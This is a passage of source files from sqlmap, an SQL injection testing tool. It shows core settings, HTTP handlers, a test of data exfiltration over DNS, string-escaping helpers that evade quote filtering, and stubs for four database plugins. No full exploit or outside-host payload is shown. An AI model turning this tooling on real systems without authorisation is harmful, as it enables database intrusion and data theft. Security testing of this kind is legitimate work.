18 | mergedOptions = AttribDict()
19 |
20 | # object to share within function and classes command
21 | # line options and settings
22 | conf = AttribDict()
23 |
24 | # object to share within function and classes results
25 | kb = AttribDict()
26 |
27 | # object with each database management system specific queries
28 | queries = {}
29 |
30 | # logger
31 | logger = LOGGER
32 |
--------------------------------------------------------------------------------
/lib/core/defaults.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.datatype import AttribDict
9 |
10 | _defaults = {
11 | "csvDel": ',',
12 | "timeSec": 5,
13 | "googlePage": 1,
14 | "verbose": 1,
15 | "delay": 0,
16 | "timeout": 30,
17 | "retries": 3,
18 | "csrfRetries": 0,
19 | "safeFreq": 0,
20 | "threads": 1,
21 | "level": 1,
22 | "risk": 1,
23 | "dumpFormat": "CSV",
24 | "tablePrefix": "sqlmap",
25 | "technique": "BEUSTQ",
26 | "torType": "SOCKS5",
27 | }
28 |
29 | defaults = AttribDict(_defaults)
30 |
--------------------------------------------------------------------------------
/lib/core/profiling.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import cProfile
9 | import os
10 |
11 | from lib.core.data import logger
12 | from lib.core.data import paths
13 |
14 | def profile(profileOutputFile=None):
15 | """
16 | This will run the program and present profiling data in a nice looking graph
17 | """
18 |
19 | if profileOutputFile is None:
20 | profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw")
21 |
22 | if os.path.exists(profileOutputFile):
23 | os.remove(profileOutputFile)
24 |
25 | # Start sqlmap main function and generate a raw profile file
26 | cProfile.run("start()", profileOutputFile)
27 |
28 | infoMsg = "execution profiled and stored into file '%s' (e.g. 'gprof2dot -f pstats %s | dot -Tpng -o /tmp/sqlmap_profile.png')" % (profileOutputFile, profileOutputFile)
29 | logger.info(infoMsg)
30 |
--------------------------------------------------------------------------------
/lib/core/unescaper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.common import Backend
9 | from lib.core.datatype import AttribDict
10 | from lib.core.settings import EXCLUDE_UNESCAPE
11 |
12 | class Unescaper(AttribDict):
13 | def escape(self, expression, quote=True, dbms=None):
14 | if expression is None:
15 | return expression
16 |
17 | for exclude in EXCLUDE_UNESCAPE:
18 | if exclude in expression:
19 | return expression
20 |
21 | identifiedDbms = Backend.getIdentifiedDbms()
22 |
23 | if dbms is not None:
24 | retVal = self[dbms](expression, quote=quote)
25 | elif identifiedDbms is not None and identifiedDbms in self:
26 | retVal = self[identifiedDbms](expression, quote=quote)
27 | else:
28 | retVal = expression
29 |
30 | # e.g. inference comparison for '
31 | retVal = retVal.replace("'''", "''''")
32 |
33 | return retVal
34 |
35 | unescaper = Unescaper()
36 |
--------------------------------------------------------------------------------
/lib/parse/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/request/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/request/methodrequest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getText
9 | from thirdparty.six.moves import urllib as _urllib
10 |
11 | class MethodRequest(_urllib.request.Request):
12 | """
13 | Used to create HEAD/PUT/DELETE/... requests with urllib
14 | """
15 |
16 | def set_method(self, method):
17 | self.method = getText(method.upper()) # Dirty hack for Python3 (may it rot in hell!)
18 |
19 | def get_method(self):
20 | return getattr(self, 'method', _urllib.request.Request.get_method(self))
21 |
--------------------------------------------------------------------------------
/lib/request/pkihandler.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import conf
9 | from lib.core.common import getSafeExString
10 | from lib.core.exception import SqlmapConnectionException
11 | from thirdparty.six.moves import http_client as _http_client
12 | from thirdparty.six.moves import urllib as _urllib
13 |
14 | class HTTPSPKIAuthHandler(_urllib.request.HTTPSHandler):
15 | def __init__(self, auth_file):
16 | _urllib.request.HTTPSHandler.__init__(self)
17 | self.auth_file = auth_file
18 |
19 | def https_open(self, req):
20 | return self.do_open(self.getConnection, req)
21 |
22 | def getConnection(self, host, timeout=None):
23 | try:
24 | # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
25 | return _http_client.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
26 | except IOError as ex:
27 | errMsg = "error occurred while using key "
28 | errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex))
29 | raise SqlmapConnectionException(errMsg)
30 |
--------------------------------------------------------------------------------
/lib/request/rangehandler.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapConnectionException
9 | from thirdparty.six.moves import urllib as _urllib
10 |
11 | class HTTPRangeHandler(_urllib.request.BaseHandler):
12 | """
13 | Handler that enables HTTP Range headers.
14 |
15 | Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file
16 | """
17 |
18 | def http_error_206(self, req, fp, code, msg, hdrs):
19 | # 206 Partial Content Response
20 | r = _urllib.response.addinfourl(fp, hdrs, req.get_full_url())
21 | r.code = code
22 | r.msg = msg
23 | return r
24 |
25 | def http_error_416(self, req, fp, code, msg, hdrs):
26 | # HTTP's Range Not Satisfiable error
27 | errMsg = "there was a problem while connecting "
28 | errMsg += "target ('406 - Range Not Satisfiable')"
29 | raise SqlmapConnectionException(errMsg)
30 |
--------------------------------------------------------------------------------
/lib/request/templates.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import kb
9 | from lib.request.connect import Connect as Request
10 |
11 | def getPageTemplate(payload, place):
12 | retVal = (kb.originalPage, kb.errorIsNone)
13 |
14 | if payload and place:
15 | if (payload, place) not in kb.pageTemplates:
16 | page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
17 | kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
18 |
19 | retVal = kb.pageTemplates[(payload, place)]
20 |
21 | return retVal
22 |
--------------------------------------------------------------------------------
/lib/takeover/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/techniques/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/techniques/blind/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/techniques/dns/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/techniques/dns/test.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.common import Backend
9 | from lib.core.common import randomInt
10 | from lib.core.data import conf
11 | from lib.core.data import kb
12 | from lib.core.data import logger
13 | from lib.core.dicts import FROM_DUMMY_TABLE
14 | from lib.core.exception import SqlmapNotVulnerableException
15 | from lib.techniques.dns.use import dnsUse
16 |
17 | def dnsTest(payload):
18 | logger.info("testing for data retrieval through DNS channel")
19 |
20 | randInt = randomInt()
21 | kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt)
22 |
23 | if not kb.dnsTest:
24 | errMsg = "data retrieval through DNS channel failed"
25 | if not conf.forceDns:
26 | conf.dnsDomain = None
27 | errMsg += ". Turning off DNS exfiltration support"
28 | logger.error(errMsg)
29 | else:
30 | raise SqlmapNotVulnerableException(errMsg)
31 | else:
32 | infoMsg = "data retrieval through DNS channel was successful"
33 | logger.info(infoMsg)
34 |
--------------------------------------------------------------------------------
/lib/techniques/error/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/techniques/union/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/utils/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/utils/timeout.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import threading
9 |
10 | from lib.core.data import logger
11 | from lib.core.enums import CUSTOM_LOGGING
12 | from lib.core.enums import TIMEOUT_STATE
13 |
14 | def timeout(func, args=None, kwargs=None, duration=1, default=None):
15 | class InterruptableThread(threading.Thread):
16 | def __init__(self):
17 | threading.Thread.__init__(self)
18 | self.result = None
19 | self.timeout_state = None
20 |
21 | def run(self):
22 | try:
23 | self.result = func(*(args or ()), **(kwargs or {}))
24 | self.timeout_state = TIMEOUT_STATE.NORMAL
25 | except Exception as ex:
26 | logger.log(CUSTOM_LOGGING.TRAFFIC_IN, ex)
27 | self.result = default
28 | self.timeout_state = TIMEOUT_STATE.EXCEPTION
29 |
30 | thread = InterruptableThread()
31 | thread.start()
32 | thread.join(duration)
33 |
34 | if thread.is_alive():
35 | return default, TIMEOUT_STATE.TIMEOUT
36 | else:
37 | return thread.result, thread.timeout_state
38 |
--------------------------------------------------------------------------------
/lib/utils/versioncheck.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import sys
9 | import time
10 |
11 | PYVERSION = sys.version.split()[0]
12 |
13 | if PYVERSION < "2.6":
14 | sys.exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6, 2.7 or 3.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION))
15 |
16 | errors = []
17 | extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib")
18 | for _ in extensions:
19 | try:
20 | __import__(_)
21 | except ImportError:
22 | errors.append(_)
23 |
24 | if errors:
25 | errMsg = "[%s] [CRITICAL] missing one or more core extensions (%s) " % (time.strftime("%X"), ", ".join("'%s'" % _ for _ in errors))
26 | errMsg += "most likely because current version of Python has been "
27 | errMsg += "built without appropriate dev packages"
28 | sys.exit(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/plugins/dbms/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/plugins/dbms/access/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import ACCESS_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.access.enumeration import Enumeration
12 | from plugins.dbms.access.filesystem import Filesystem
13 | from plugins.dbms.access.fingerprint import Fingerprint
14 | from plugins.dbms.access.syntax import Syntax
15 | from plugins.dbms.access.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Microsoft Access methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = ACCESS_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.ACCESS] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/access/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Microsoft Access it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Microsoft Access it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/access/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)&CHR(98)&CHR(99)&CHR(100)&CHR(101)&CHR(102)&CHR(103)&CHR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "&".join("CHR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/access/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Microsoft Access it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Microsoft Access it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Microsoft Access it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Microsoft Access it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/altibase/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import ALTIBASE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.altibase.enumeration import Enumeration
13 | from plugins.dbms.altibase.filesystem import Filesystem
14 | from plugins.dbms.altibase.fingerprint import Fingerprint
15 | from plugins.dbms.altibase.syntax import Syntax
16 | from plugins.dbms.altibase.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class AltibaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Altibase methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = ALTIBASE_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.ALTIBASE] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/altibase/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on Altibase it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/altibase/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getStatements(self):
13 | warnMsg = "on Altibase it is not possible to enumerate the SQL statements"
14 | logger.warning(warnMsg)
15 |
16 | return []
17 |
18 | def getHostname(self):
19 | warnMsg = "on Altibase it is not possible to enumerate the hostname"
20 | logger.warning(warnMsg)
21 |
--------------------------------------------------------------------------------
/plugins/dbms/altibase/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/altibase/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/altibase/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Altibase it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Altibase it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Altibase it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Altibase it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/cache/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import CACHE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.cache.enumeration import Enumeration
13 | from plugins.dbms.cache.filesystem import Filesystem
14 | from plugins.dbms.cache.fingerprint import Fingerprint
15 | from plugins.dbms.cache.syntax import Syntax
16 | from plugins.dbms.cache.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class CacheMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Cache methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = CACHE_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.CACHE] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/cache/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/cache/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> from lib.core.common import Backend
16 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar"
17 | True
18 | """
19 |
20 | def escaper(value):
21 | return "||".join("CHAR(%d)" % _ for _ in getOrds(value))
22 |
23 | return Syntax._escape(expression, quote, escaper)
24 |
--------------------------------------------------------------------------------
/plugins/dbms/cache/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Cache it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Cache it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Cache it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Cache it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/clickhouse/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import CLICKHOUSE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.clickhouse.enumeration import Enumeration
13 | from plugins.dbms.clickhouse.filesystem import Filesystem
14 | from plugins.dbms.clickhouse.fingerprint import Fingerprint
15 | from plugins.dbms.clickhouse.syntax import Syntax
16 | from plugins.dbms.clickhouse.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines ClickHouse methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = CLICKHOUSE_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.CLICKHOUSE] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/clickhouse/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.connector import Connector as GenericConnector
9 |
10 | class Connector(GenericConnector):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/clickhouse/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getPasswordHashes(self):
13 | warnMsg = "on ClickHouse it is not possible to enumerate the user password hashes"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
18 | def getRoles(self, *args, **kwargs):
19 | warnMsg = "on ClickHouse it is not possible to enumerate the user roles"
20 | logger.warning(warnMsg)
21 |
22 | return {}
23 |
--------------------------------------------------------------------------------
/plugins/dbms/clickhouse/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on ClickHouse it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on ClickHouse it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/clickhouse/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT char(97)||char(98)||char(99)||char(100)||char(101)||char(102)||char(103)||char(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("char(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/clickhouse/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on ClickHouse it is not possible to execute commands"
